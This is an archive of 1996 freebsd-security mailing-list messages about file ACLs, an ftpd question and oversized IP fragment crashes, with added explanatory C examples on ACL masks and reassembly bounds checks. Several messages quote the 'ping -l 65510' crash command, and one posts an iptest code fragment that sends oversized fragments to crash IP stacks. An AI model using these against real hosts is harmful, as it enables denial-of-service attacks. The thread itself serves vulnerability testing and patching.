From owner-freebsd-security Sun Oct 20 10:14:46 1996
From: Wes Peters
To: Jerry Kelley
Cc: security@freebsd.org
Date: Sun, 20 Oct 1996 11:16:12 -0600 (MDT)
Subject: Any FreeBSD security topics of interest?
Message-Id: <199610201716.LAA04095@obie.softweyr.com>
In-Reply-To: <326902B1.F1A@iquest.net>

Jerry Kelley writes:
> Again, my goal is a new topic or improvement to security for UNIX that
> could be implemented (and added) to FreeBSD. I'd like to give something
> back to the FreeBSD community because I believe strongly in the
> principles of a freely available OS.

I'm sure there are others more deeply embedded in the security woes of
{Free,Net,Open}BSD who can answer in more detail, but one topic immediately
springs to mind: extend the ufs file system to use per-file access control
lists. If you're not familiar with ACLs, get your hands on an HP-UX system
and try 'man acl'. Their ACL system is workable and relatively UNIX-ish.

ACLs have a lot of potential for clearing up some sticky administration
problems in UNIX. Many of the setuid programs we worry about could be more
carefully restricted with carefully applied ACLs, and many of the tasks that
you have to 'su' to do today could be ACL'ed and setuid so that specific
groups or individuals could perform them without needing to su.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters
Softweyr LLC    http://www.xmission.com/~softweyr    softweyr@xmission.com
From owner-freebsd-security Sun Oct 20 19:51:36 1996
From: Brian Tao
To: David Greenman
Cc: Ollivier Robert, freebsd-security@freebsd.org
Date: Sun, 20 Oct 1996 22:51:12 -0400 (EDT)
Subject: Re: bin/1805: Bug in ftpd
In-Reply-To: <199610151911.MAA02970@root.com>

On Tue, 15 Oct 1996, David Greenman wrote:
>
> Unfortunately, this isn't true for anonymous ftp which runs as root.

    Doesn't an anon ftp connection open the chrooted /etc/spwd.db though
(e.g., /var/spool/ftp/etc/spwd.db, here)?
--
Brian Tao (BT300, taob@io.org, taob@ican.net)
Senior Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"
From owner-freebsd-security Sun Oct 20 23:17:47 1996
From: David Greenman
Reply-To: dg@root.com
To: Brian Tao
Cc: Ollivier Robert, freebsd-security@freebsd.org
Date: Sun, 20 Oct 1996 23:18:11 -0700
Subject: Re: bin/1805: Bug in ftpd
Message-Id: <199610210618.XAA21376@root.com>
In-Reply-To: Your message of "Sun, 20 Oct 1996 22:51:12 EDT."

>On Tue, 15 Oct 1996, David Greenman wrote:
>>
>> Unfortunately, this isn't true for anonymous ftp which runs as root.
>
>    Doesn't an anon ftp connection open the chrooted /etc/spwd.db
>though (e.g., /var/spool/ftp/etc/spwd.db, here)?

   Hmmm. I think it still opens the normal one first in order to verify the
existence of the "ftp" user. In any case, I don't think this is an issue
because the core file is created with uid 0 and 0600 permissions...and ftpd
accesses files as user ftp when running as anonymous. So in other words, even
if it did create a core file, the anonymous user wouldn't be able to read it.

-DG

David Greenman
Core-team/Principal Architect, The FreeBSD Project
From owner-freebsd-security Mon Oct 21 14:10:07 1996
From: Steve Reid
To: security@freebsd.org
Date: Mon, 21 Oct 1996 14:09:43 -0700 (PDT)
Subject: [bugtraq] Serious Linux Security Bug

This has been discussed on the Bugtraq list for a few days now, but I
haven't seen any talk of it here.

There is no mention of the attack working against *BSD machines except for
one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress
card stopped working for a couple of minutes.

The attack is simple. From a Win95 box,

    ping -l 65510 buggyhost

and it can crash or reboot some OSs. Very nasty.

Has anyone checked the FreeBSD kernel to make sure that we're not
vulnerable?

---------- Forwarded message ----------
Date: Mon, 21 Oct 1996 09:26:04 +0100
From: Alan Cox
To: Multiple recipients of list BUGTRAQ
Subject: Re: Urgent !! Serious Linux Security Bug....

> >On the Linux machine, you need to be running kernel version 2.0.7 (It's
> >the lowest we run) up to version 2.0.20 (The highest we're running).
>
> Actually, I'm running 2.1.1 and it works on that as well...

It seems to work rather nicely on Digital Unix (some revisions), AIX,
Linux 2.0.x and Linux 2.1.x - has anyone tried it on NT?

Ironically it's a well known problem that is tested by the ip_send tool.
It just happened that the test tool I used didn't construct a packet with
a useful IP protocol field and it thus never hit the layer of code that
can't handle forged big packets.

As well as the patch quoted there is a slightly newer revision that also
happens to log who tried to blow up your computer.

Alan
From owner-freebsd-security Mon Oct 21 14:36:30 1996
From: Poul-Henning Kamp
To: Steve Reid
Cc: security@freebsd.org
Date: Mon, 21 Oct 1996 23:35:34 +0200
Subject: Re: [bugtraq] Serious Linux Security Bug
Message-ID: <3975.845933734@critter.tfs.com>
In-Reply-To: Your message of "Mon, 21 Oct 1996 14:09:43 PDT."

In message , Steve Reid writes:

>There is no mention of the attack working against *BSD machines except for
>one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress
>card stopped working for a couple of minutes.

my card does that all the time. The ix cards suck and consequently nobody
loved the driver.

--
Poul-Henning Kamp           | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                | phk@ref.tfs.com       TRW Financial Systems, Inc.
Future will arrive by its own means, progress not so.
From owner-freebsd-security Mon Oct 21 14:58:35 1996
From: Brandon Gillespie
To: Steve Reid
Cc: security@freebsd.org
Date: Mon, 21 Oct 1996 16:00:20 -0600 (MDT)
Subject: Re: [bugtraq] Serious Linux Security Bug

On Mon, 21 Oct 1996, Steve Reid wrote:
> This has been discussed on the Bugtraq list for a few days now, but I
> haven't seen any talk of it here.
>
> There is no mention of the attack working against *BSD machines except for
> one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress
> card stopped working for a couple of minutes.
>
> The attack is simple. From a Win95 box,
> ping -l 65510 buggyhost
> and it can crash or reboot some OSs. Very nasty.
>
> Has anyone checked the FreeBSD kernel to make sure that we're not
> vulnerable?

I just tried this (from w95) against a FreeBSD 2.1.5 box and a 2.1.0 box,
both had no problems. Of course, I'm not sure if the ping ran correctly,
it returned:

    Request timed out.

Instead. It does work without the '-l 65510' args.

-Brandon

From owner-freebsd-security Mon Oct 21 15:44:48 1996
From: Troy Arie Cobb
To: security@FreeBSD.org
Date: Mon, 21 Oct 1996 18:43:08 -0400 (EDT)
Subject: Re: [bugtraq] Serious Linux Security Bug

On Mon, 21 Oct 1996, Brandon Gillespie wrote:

> Date: Mon, 21 Oct 1996 16:00:20 -0600 (MDT)
> From: Brandon Gillespie
> To: Steve Reid
> Cc: security@FreeBSD.org
> Subject: Re: [bugtraq] Serious Linux Security Bug
>
> On Mon, 21 Oct 1996, Steve Reid wrote:
> > This has been discussed on the Bugtraq list for a few days now, but I
> > haven't seen any talk of it here.
> >
> > There is no mention of the attack working against *BSD machines except for
> > one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress
> > card stopped working for a couple of minutes.
> >
> > The attack is simple. From a Win95 box,
> > ping -l 65510 buggyhost
> > and it can crash or reboot some OSs. Very nasty.
> >
> > Has anyone checked the FreeBSD kernel to make sure that we're not
> > vulnerable?
>
> I just tried this (from w95) against a FreeBSD 2.1.5 box and a 2.1.0 box,
> both had no problems. Of course, I'm not sure if the ping ran correctly,
> it returned:
>
> Request timed out.
>
> Instead. It does work without the '-l 65510' args.

Ditto. But watching on the FBsd box when it happened I noticed that most of
the network MBUFS filled up, caused the machine to stutter for a brief
second and then flushed it.

I'd guess that it triggers a fringe condition in the somewhat poor
networking code in Linux. Ugly. Glad to be on FreeBSD,

- troy

Troy Arie Cobb                      troy@circle.net
------------------------------------------------------
| Circle Net, Inc.        | global internet access     |
| http://www.circle.net   | for western north carolina |
| info@circle.net         | and beyond...              |
| 704-254-9500            |                            |
------------------------------------------------------
From owner-freebsd-security Mon Oct 21 18:44:44 1996
From: Cy Schubert
Reply-To: cschuber@uumail.gov.bc.ca
To: Wes Peters
Cc: Jerry Kelley, security@FreeBSD.ORG
Date: Mon, 21 Oct 1996 18:44:16 -0700
Subject: Re: Any FreeBSD security topics of interest?
Message-Id: <199610220144.SAA00894@cwsys.cwent.com>
In-Reply-To: Your message of "Sun, 20 Oct 1996 11:16:12 MDT." <199610201716.LAA04095@obie.softweyr.com>

> Jerry Kelley writes:
[...]
>
> ACLs have a lot of potential for clearing up some sticky
> administration problems in UNIX. Many of the setuid programs we worry
> about could be more carefully restricted with carefully applied ACLs,
> and many of the tasks that you have to 'su' to do today could be
> ACL'ed and setuid so that specific groups or individuals could perform
> them without needing to su.

I and my team have been using ACL's on the Solaris 2.5 and 2.5.1 boxes for
quite some time. They've been lifesavers. We've been able to delegate
management of the SNA software on one of the Solaris boxes we manage to the
DB2 DBA team using a combination of ACL's and sudo. This would be a handy
addition to FreeBSD as well.

Solaris uses two commands to manage ACL's, setfacl and getfacl. The ls -l
listing has also changed to add a + to the permissions to indicate that
ACL's are in use, e.g.,

    -rw-r--r--+  1 root     other        137 Oct 11 11:18 foo

If we do a getfacl foo we get,

    # file: foo
    # owner: root
    # group: other
    user::rw-
    group::r--              #effective:r--
    group:sna:rw-           #effective:rw-
    mask:rwx
    other:r--

This in turn can be used as input on a setfacl command, e.g.,

    getfacl foo | setfacl -f - foobar

Regards,                        Phone:    (250)389-3827
Cy Schubert                     OV/VM:    BCSC02(CSCHUBER)
Open Systems Support            BITNET:   CSCHUBER@BCSC02.BITNET
ITSD                            Internet: cschuber@uumail.gov.bc.ca
                                          cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."
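The mask semantics behind the getfacl listing above, as an added example that is not part of the thread and is not Solaris or FreeBSD code: the ACL type, the "#effective:" computation and the POSIX.1e-style access check below are written for this page. The ACL reproduces the entries shown for "foo" (owner root, group other, user::rw-, group::r--, group:sna:rw-, mask:rwx, other:r--); a second copy with mask:r-- shows what tightening the mask does to the sna entry without touching it. The users alice and bob and their group memberships are made up, and a subject is modelled with a single group for brevity. The check goes beyond the listing in that it also implements the named-user step of the algorithm, which the listing has no entry for.

```c
/*
 * POSIX.1e-style ACL evaluation with a mask entry (example written for this
 * page; not code from the thread, Solaris or FreeBSD).  The owner (user::)
 * and other entries are never masked; the owning-group, named-user and
 * named-group entries are ANDed with the mask, which is what getfacl's
 * "#effective:" column reports.
 */
#include <stdio.h>
#include <string.h>

#define P_R 4
#define P_W 2
#define P_X 1

enum tag { USER_OBJ, USER, GROUP_OBJ, GROUP, MASK, OTHER };

struct ace { enum tag tag; const char *name; int perm; };   /* name: USER/GROUP only */
struct acl { const char *owner, *group; const struct ace *ents; int n; };

/* getfacl foo, as posted: user::rw- group::r-- group:sna:rw- mask:rwx other:r-- */
const struct ace foo_ents[] = {
    { USER_OBJ, NULL, P_R | P_W }, { GROUP_OBJ, NULL, P_R }, { GROUP, "sna", P_R | P_W },
    { MASK, NULL, P_R | P_W | P_X }, { OTHER, NULL, P_R },
};
const struct acl foo_acl = { "root", "other", foo_ents, 5 };

/* Same ACL with the mask tightened to r--; the sna entry still says rw-. */
const struct ace foo_tight_ents[] = {
    { USER_OBJ, NULL, P_R | P_W }, { GROUP_OBJ, NULL, P_R }, { GROUP, "sna", P_R | P_W },
    { MASK, NULL, P_R }, { OTHER, NULL, P_R },
};
const struct acl foo_tight_acl = { "root", "other", foo_tight_ents, 5 };

/* "rw-" -> P_R|P_W */
int perm_parse(const char *s)
{
    int p = 0;
    for (; *s; s++)
        p |= *s == 'r' ? P_R : *s == 'w' ? P_W : *s == 'x' ? P_X : 0;
    return p;
}

/* P_R|P_W -> "rw-" in the caller's 4-byte buffer */
const char *perm_str(int p, char buf[4])
{
    buf[0] = p & P_R ? 'r' : '-';
    buf[1] = p & P_W ? 'w' : '-';
    buf[2] = p & P_X ? 'x' : '-';
    buf[3] = '\0';
    return buf;
}

static int tag_perm(const struct acl *a, enum tag t)
{
    for (int i = 0; i < a->n; i++)
        if (a->ents[i].tag == t) return a->ents[i].perm;
    return 0;
}

/* The mask entry; an ACL without extended entries has none, so rwx. */
int acl_mask(const struct acl *a)
{
    for (int i = 0; i < a->n; i++)
        if (a->ents[i].tag == MASK) return a->ents[i].perm;
    return P_R | P_W | P_X;
}

/* Effective rights of entry i, as getfacl prints them. */
int acl_effective(const struct acl *a, int i)
{
    const struct ace *e = &a->ents[i];
    if (e->tag == USER_OBJ || e->tag == OTHER || e->tag == MASK) return e->perm;
    return e->perm & acl_mask(a);
}

/*
 * Check order: owner, then a named-user entry, then every group entry the
 * subject belongs to, then other.  A matching named-user entry decides even
 * when it lacks the right (no fall-through); among matching group entries,
 * any one that grants the right after masking is enough.
 */
int acl_access(const struct acl *a, const char *user, const char *group, int want)
{
    int mask = acl_mask(a), matched_group = 0;
    if (strcmp(user, a->owner) == 0)
        return (tag_perm(a, USER_OBJ) & want) == want;
    for (int i = 0; i < a->n; i++)
        if (a->ents[i].tag == USER && strcmp(a->ents[i].name, user) == 0)
            return (a->ents[i].perm & mask & want) == want;
    for (int i = 0; i < a->n; i++) {
        const struct ace *e = &a->ents[i];
        int hit = (e->tag == GROUP_OBJ && strcmp(group, a->group) == 0) ||
                  (e->tag == GROUP && strcmp(group, e->name) == 0);
        if (!hit) continue;
        matched_group = 1;
        if ((e->perm & mask & want) == want) return 1;
    }
    if (matched_group) return 0;
    return (tag_perm(a, OTHER) & want) == want;
}

int main(void)
{
    char b[4];
    for (int i = 0; i < foo_acl.n; i++)
        printf("entry %d  #effective:%s\n", i, perm_str(acl_effective(&foo_acl, i), b));
    printf("alice(sna) write: %d\n", acl_access(&foo_acl, "alice", "sna", P_W));
    printf("alice(sna) write, mask:r--: %d\n", acl_access(&foo_tight_acl, "alice", "sna", P_W));
    printf("bob(other) write: %d\n", acl_access(&foo_acl, "bob", "other", P_W));
    return 0;
}
```

The point the mask makes for delegation of the kind described in the message: a single `setfacl -m mask:r-- foo` revokes write from every named user and group at once, while the entries themselves keep recording who was meant to have it.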
From owner-freebsd-security Mon Oct 21 22:37:46 1996
From: obrien@NUXI.cs.ucdavis.edu (David E. O'Brien)
To: brandon@glacier.cold.org (Brandon Gillespie)
Cc: steve@edmweb.com (Steve Reid), security@FreeBSD.ORG
Date: Mon, 21 Oct 1996 22:37:55 -0700
Subject: Re: [bugtraq] Serious Linux Security Bug
Message-Id: <199610220537.WAA06158@relay.nuxi.com>
In-Reply-To: from Brandon Gillespie on Oct 21, 1996 16:00:20 -0600

Brandon Gillespie writes:
> I just tried this (from w95) against a FreeBSD 2.1.5 box and a 2.1.0 box,
> both had no problems. Of course, I'm not sure if the ping ran correctly,
> it returned:
>
> Request timed out.

This is the same output you get when you *do* kill a host. The only way to
see if this was "effective" is to watch the console of the host.

--
-- David (obrien@cs.ucdavis.edu)
From owner-freebsd-security Mon Oct 21 23:03:53 1996
From: Piotr Piesik
To: security@freebsd.org, steve@edmweb.com
Date: Tue, 22 Oct 1996 08:03:43 +0200 (MET DST)
Subject: Re: [bugtraq] Serious Linux Security Bug
Message-Id: <199610220603.IAA19921@arrakis.cs.put.poznan.pl>

> There is no mention of the attack working against *BSD machines except for
> one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress
> card stopped working for a couple of minutes.

My 3Com 3c509 on 2.1.0 stops for a couple of seconds. Win95 reports timeout.

Piotr
---------------------------------------------------------------
Piotr Piesik, MSc, NetWare & Unix system administrator
Institute of Computing Science, Poznan University of Technology
ul. Piotrowo 3A, 60-965 Poznan, Poland
office: tel: +4861 782557   fax: +4861 771525
home:   tel/fax +4861 750231
---------------------------------------------------------------
 .->-.
 `-<-'   Transmitted on 100% recycled electrons
From owner-freebsd-security Tue Oct 22 04:14:20 1996
From: Gary Howland
Organization: Systemics Ltd.
To: Steve Reid
Cc: security@freebsd.org
Date: Tue, 22 Oct 1996 13:14:28 +0200
Subject: Re: [bugtraq] Serious Linux Security Bug
Message-ID: <326CAC94.5358CBEE@systemics.com>

Steve Reid wrote:
>
> This has been discussed on the Bugtraq list for a few days now, but I
> haven't seen any talk of it here.
>
> There is no mention of the attack working against *BSD machines except for
> one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress
> card stopped working for a couple of minutes.
>
> The attack is simple. From a Win95 box,
> ping -l 65510 buggyhost
> and it can crash or reboot some OSs. Very nasty.
>
> Has anyone checked the FreeBSD kernel to make sure that we're not
> vulnerable?

I've tried it on 2.1 and 2.2 and they behave OK (although they don't reply
to the ping, unlike a windoze machine).

I was trying to emulate the problem with a small perl script, but haven't
got a suitable "target". Anyone out there care to test it for me?

Best regards,
Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06
From owner-freebsd-security Tue Oct 22 05:50:47 1996
From: Lutz Albers
To: Steve Reid
Cc: security@freebsd.org
Date: Tue, 22 Oct 1996 13:15:53 +0200
Subject: Re: [bugtraq] Serious Linux Security Bug

Steve Reid wrote on 21.10.1996 [bugtraq] Serious Linux Security Bug

>There is no mention of the attack working against *BSD machines except for
>one person running FreeBSD 2.1.5 who reported that his Intel EtherExpress
>card stopped working for a couple of minutes.
>
>The attack is simple. From a Win95 box,
>ping -l 65510 buggyhost
>and it can crash or reboot some OSs. Very nasty.
>
>Has anyone checked the FreeBSD kernel to make sure that we're not
>vulnerable?

Just tried it from one 2.1.5R machine to another (source using a 3COM509
(ep0), target using a SMC Elite 16C (ed0)) with no problems. It did take
some time for the source machine preparing the ICMP request (machine crawls
with all caches disabled :-(

lutz
---------------------------------------------------------------------
Lutz Albers                                 | What's good ?
Luederitzstr. 14, 81929-Muenchen, Germany   | Life's good -
ph: +49-89-93940363                         | But not fair at all
fax:+49-89-93940365                         | (Lou Reed)
Do not take life too seriously, you will never get out of it alive.
From owner-freebsd-security Tue Oct 22 06:38:07 1996
From: Darren Reed
To: lutz@muc.de (Lutz Albers)
Cc: security@freebsd.org
Date: Tue, 22 Oct 1996 23:35:12 +1000 (EST)
Subject: Re: [bugtraq] Serious Linux Security Bug
Message-Id: <199610221338.GAA28820@freefall.freebsd.org>
In-Reply-To: from "Lutz Albers" at Oct 22, 96 01:15:53 pm

Solaris2 was, I believe, vulnerable to this bug too.

From the "Crashable" file for iptest:

Solaris 2.4 - up to and including 101945-34, > 34 ?
Solaris 2.5 - 11/95

For those with it handy, "iptest -1 -p 8". but I built in some random
lossage which may stop it triggering the bug. I think if the lossage is
taken out, some systems will try to reassemble it all into a buffer which
(of course), is at max. 64k in size. However, it doesn't try to send an
ICMP packet, the following segment of code is what triggers it:

    if (!ptest || (ptest == 8)) {
        struct timeval tv;

        gettimeofday(&tv, NULL);
        srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
        /*
         * Part8: 63k packet + 1k fragment at offset 0x1ffe
         */
        ip->ip_off = IP_MF;
        u->uh_dport = htons(9);
        ip->ip_id = htons(id++);
        printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
        ip->ip_len = 768 + 20 + 8;
        if ((rand() & 0x1f) != 0) {
            (void) send_ip(nfd, mtu, ip, gwip, 1);
            printf("%d\r", i);
        } else
            printf("skip 0\n");
        ip->ip_len = MIN(768 + 20, mtu - 68);
        i = 512;
        for (; i < (63 * 1024 + 768); i += 768) {
            ip->ip_off = IP_MF | (i >> 3);
            if ((rand() & 0x1f) != 0) {
                (void) send_ip(nfd, mtu, ip, gwip, 1);
                printf("%d\r", i);
            } else
                printf("skip %d\n", i);
            fflush(stdout);
            PAUSE();
        }
        ip->ip_len = 896 + 20;
        ip->ip_off = IP_MF | (i >> 3);
        if ((rand() & 0x1f) != 0) {
            (void) send_ip(nfd, mtu, ip, gwip, 1);
            printf("%d\r", i);
        } else
            printf("skip\n");
        putchar('\n');
        fflush(stdout);
    }

Doesn't work against any system using BSD based IP networking code.

Darren
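The bounds check that the oversized-ping reports earlier in this thread and the iptest fragment above both probe, as an added example that is not part of the thread and is not code from iptest or from any kernel: the fragment struct, the fragment generator and both reassembly routines below are written for this page. An IP header's total-length field is 16 bits, so a datagram can carry at most 65535 minus the 20-byte header of payload; a fragment whose offset*8 plus length ends past that is invalid, and a reassembler that sizes its buffer from that limit but places fragments without checking the sum writes past it. ping_fragments() models how a sender splits "ping -l <bytes>" over an MTU (1500 is assumed; the 8-byte ICMP echo header is counted as payload), and lone_fragment() models a single fragment such as iptest's 1k at offset 0x1ffe. The example goes beyond the specific 65510 case in that the check is the general one applied to every fragment.

```c
/*
 * IP fragment reassembly with and without the end-of-datagram bounds check
 * (example written for this page; not code from the thread, iptest or any
 * kernel).  Offsets are in 8-byte units as carried in the IP header.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_MAXPACKET 65535u
#define IP_HDRLEN    20u
#define ICMP_HDRLEN  8u
#define MAX_PAYLOAD  (IP_MAXPACKET - IP_HDRLEN)   /* 65515: largest legal payload */

struct frag {
    uint16_t off8;   /* fragment offset in 8-byte units */
    int      more;   /* MF flag: more fragments follow */
    uint16_t len;    /* payload bytes in this fragment */
};

static unsigned char reasm_buf[MAX_PAYLOAD];   /* one datagram's reassembly buffer */

/* First byte offset past this fragment's payload. */
static unsigned frag_end(const struct frag *f)
{
    return (unsigned)f->off8 * 8u + f->len;
}

/*
 * Split an ICMP echo carrying `data` bytes into fragments for links of the
 * given MTU, as the sender of "ping -l <data>" would.  Returns the fragment
 * count, or 0 if `out` cannot hold them all.
 */
size_t ping_fragments(unsigned data, unsigned mtu, struct frag *out, size_t max)
{
    unsigned payload = data + ICMP_HDRLEN;
    unsigned per = (mtu - IP_HDRLEN) & ~7u;    /* non-final fragments: multiple of 8 */
    size_t n = 0;
    for (unsigned pos = 0; pos < payload; pos += per) {
        unsigned left = payload - pos;
        if (n == max) return 0;
        out[n].off8 = (uint16_t)(pos / 8);
        out[n].len  = (uint16_t)(left < per ? left : per);
        out[n].more = left > per;
        n++;
    }
    return n;
}

/*
 * The unchecked figure: the size a reassembler that trusts offset+length
 * believes the datagram has.  Above MAX_PAYLOAD, a copy into a
 * MAX_PAYLOAD-byte buffer runs past its end by exactly the difference.
 */
unsigned reassembled_len_unchecked(const struct frag *f, size_t n)
{
    unsigned end = 0;
    for (size_t i = 0; i < n; i++)
        if (frag_end(&f[i]) > end) end = frag_end(&f[i]);
    return end;
}

/*
 * Checked reassembly: every fragment is validated before anything is copied.
 * Returns the datagram payload length, or -1 when any fragment would end
 * past MAX_PAYLOAD or no final (MF=0) fragment was supplied.
 */
long reassemble_checked(const struct frag *f, size_t n, unsigned char *buf)
{
    long total = -1;
    for (size_t i = 0; i < n; i++)
        if (frag_end(&f[i]) > MAX_PAYLOAD)     /* the check the crashing stacks lacked */
            return -1;
    for (size_t i = 0; i < n; i++) {
        memset(buf + f[i].off8 * 8u, 0xEE, f[i].len);   /* stands in for the payload copy */
        if (!f[i].more) total = (long)frag_end(&f[i]);
    }
    return total;
}

/* Result of reassembling "ping -l <data>" sent over links of the given MTU. */
long ping_reassembles(unsigned data, unsigned mtu)
{
    struct frag fr[64];
    size_t n = ping_fragments(data, mtu, fr, 64);
    return n ? reassemble_checked(fr, n, reasm_buf) : -1;
}

/* What an unchecked reassembler would size the same ping at. */
unsigned ping_unchecked_len(unsigned data, unsigned mtu)
{
    struct frag fr[64];
    size_t n = ping_fragments(data, mtu, fr, 64);
    return n ? reassembled_len_unchecked(fr, n) : 0;
}

/* A single final fragment at `off8` carrying `len` bytes, on its own. */
long lone_fragment(uint16_t off8, uint16_t len)
{
    struct frag f = { off8, 0, len };
    return reassemble_checked(&f, 1, reasm_buf);
}

int main(void)
{
    printf("ping -l 65510: unchecked length %u, checked result %ld\n",
           ping_unchecked_len(65510, 1500), ping_reassembles(65510, 1500));
    printf("ping -l 65507: checked result %ld\n", ping_reassembles(65507, 1500));
    printf("1k fragment at offset 0x1ffe: %ld\n", lone_fragment(0x1ffe, 1024));
    return 0;
}
```

With the default 1500-byte MTU, "ping -l 65510" becomes 45 fragments whose last one starts at byte 65120 and ends at 65518, three bytes past the largest payload a datagram may carry; 65507 is the largest data size that still reassembles legally. Note that the check must run before any fragment is placed: validating only the final fragment, or only the running total, still lets an early oversized fragment land out of bounds.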
From owner-freebsd-security Tue Oct 22 07:16:27 1996
From: Garrett Wollman
To: cschuber@uumail.gov.bc.ca
Cc: security@FreeBSD.ORG
Date: Tue, 22 Oct 1996 10:16:11 -0400
Subject: Re: Any FreeBSD security topics of interest?
Message-Id: <9610221416.AA23679@halloran-eldar.lcs.mit.edu>
In-Reply-To: <199610220144.SAA00894@cwsys.cwent.com>
References: <199610201716.LAA04095@obie.softweyr.com> <199610220144.SAA00894@cwsys.cwent.com>

< said:

> Solaris uses two commands to manage ACL's, setfacl and getfacl. The
> ls -l listing has also changed to add a + to the permissions to
> indicate that ACL's are in use, e.g.,

> -rw-r--r--+ 1 root other 137 Oct 11 11:18 foo

I have to say that I have always preferred AFS's per-directory ACL
semantics to the more commonly implemented per-file ACLs. AFS does
not use the group and other permission bits at all, but applies the
user bits as a mask against certain rights given by the ACL. The
permission bits in AFS ACLs are `rwidlka', for `read', `write',
`insert', `delete', `lookup', `lock', and `administer' (i.e., change
the ACL). This enables certain nice features such as authenticated
local mail delivery (make a directory with permissions `System:AnyUser
lik' and they can create new mail files in that directory but cannot
read, write, or delete existing ones; the owner of the file is the
authenticated sender).

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, ANA, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Tue Oct 22 18:29:33 1996
From: Steve Reid
To: security@freebsd.org
Date: Tue, 22 Oct 1996 18:29:21 -0700 (PDT)
Subject: [more bugtraq] Re: Suspicion about denial of service attacks possible on IP. (fwd)

Another from Bugtraq. Can anyone confirm or deny the last paragraph?

For anyone who's interested, Bugtraq is archived at
http://geek-girl.com/bugtraq/

---------- Forwarded message ----------
Date: Wed, 23 Oct 1996 07:45:57 +1000
From: Darren Reed
To: Multiple recipients of list BUGTRAQ
Subject: Re: Suspicion about denial of service attacks possible on IP.

In some mail from Henrik P Johnson, sie said:
>
> I was idly reading through Internetworking with TCP/IP yesterday when it
> hit me what might be a possible denial of service attack on IP stacks.
> What would happen if a host was bombarded with faked fragments of large
> IP packages. Would the stack allocate more and more memory trying to
> reconstruct the packages or do they operate with a fixed/max size limit
> on memory allocated for IP defragmentation?

It is possible, but it requires a lot of packets. Different boxes handle it
differently too. When I tried it against my SunOS4 box, it didn't crash,
but X-Windows could not be used after it ran out of mbufs.

There's a bug in how overlapping mbufs are freed in BSD code up to
4.4BSD-Lite/2 (I believe) - that or it never got merged with FreeBSD 2.1.5.
(Patch for this is included with IP Filter ;) For FreeBSD, it seems that
the result is that it never frees the mbuf...

Darren
From owner-freebsd-security Tue Oct 22 18:59:35 1996
From: Darren Reed
To: steve@edmweb.com (Steve Reid)
Cc: security@freebsd.org
Date: Wed, 23 Oct 1996 11:59:20 +1000 (EST)
Subject: Re: [more bugtraq] Re: Suspicion about denial of service attacks possible on IP. (fwd)
Message-Id: <199610230159.SAA22136@freefall.freebsd.org>
In-Reply-To: from "Steve Reid" at Oct 22, 96 06:29:21 pm

In some mail from Steve Reid, sie said:
>
> Another from Bugtraq. Can anyone confirm or deny the last paragraph?
>

I posted the patch recently and it was picked up and committed by one of the
FreeBSD team. I don't know what branch that went into, however...
From owner-freebsd-security Tue Oct 22 19:28:29 1996
From: Don Lewis
To: Darren Reed, steve@edmweb.com (Steve Reid)
Cc: security@freebsd.org
Date: Tue, 22 Oct 1996 19:28:01 -0700
Subject: Re: [more bugtraq] Re: Suspicion about denial of service attacks possible on IP. (fwd)
Message-Id: <199610230228.TAA01479@salsa.gv.ssi1.com>
In-Reply-To: Darren Reed "Re: [more bugtraq] Re: Suspicion about denial of service attacks possible on IP. (fwd)" (Oct 23, 11:59am)

On Oct 23, 11:59am, Darren Reed wrote:
} Subject: Re: [more bugtraq] Re: Suspicion about denial of service attacks
} In some mail from Steve Reid, sie said:
} >
} > Another from Bugtraq. Can anyone confirm or deny the last paragraph?
} >
}
} I posted the patch recently and it was picked up and committed by one of the
} FreeBSD team. I don't know what branch that went into, however...

When I went to apply the patch to my copy of -stable, I noticed that it had
already been applied. I would assume that it also has been applied to
-current.

                        --- Truck
From: Softweyr LLC Message-Id: <199610242310.RAA01706@xmission.xmission.com> Subject: Re: Any FreeBSD security topics of interest? To: wollman@lcs.mit.edu (Garrett Wollman) Date: Thu, 24 Oct 1996 17:10:35 -0600 (MDT) Cc: security@freebsd.org, softweyr@xmission.xmission.com (Softweyr LLC) In-Reply-To: <9610221416.AA23679@halloran-eldar.lcs.mit.edu> from "Garrett Wollman" at Oct 22, 96 10:16:11 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > I have to say that I have always preferred AFS's per-directory ACL > semantics to the more commonly implemented per-file ACLs. AFS does > not use the group and other permission bits at all, but applies the > user bits as a mask against certain rights given by the ACL. The > permission bits in AFS ACLs are `rwidlka', for `read', `write', > `insert', `delete', `lookup', `lock', and `administer' (i.e., change > the ACL). This enables certain nice features such as authenticated > local mail delivery (make a directory with permissions `System:AnyUser > lik' and they can create new mail files in that directory but cannot > read, write, or delete existing ones; the owner of the file is the > authenticated sender). I had the opposite reaction the first time I read about them: why did they do this? The AFS ACL system does not, for instance, allow you to make a setuid-root executable that can be run by wes, sam, and DJ, but nobody else, unless you create a group that holds only those people and make it group executable. This leads to a lot of small special-purpose groups that have to be maintained. The per-file ACLs do demand more administration, but also allow more power and flexibility. The AFS model does show that we can implement more semantics than just read, write, and execute however. 
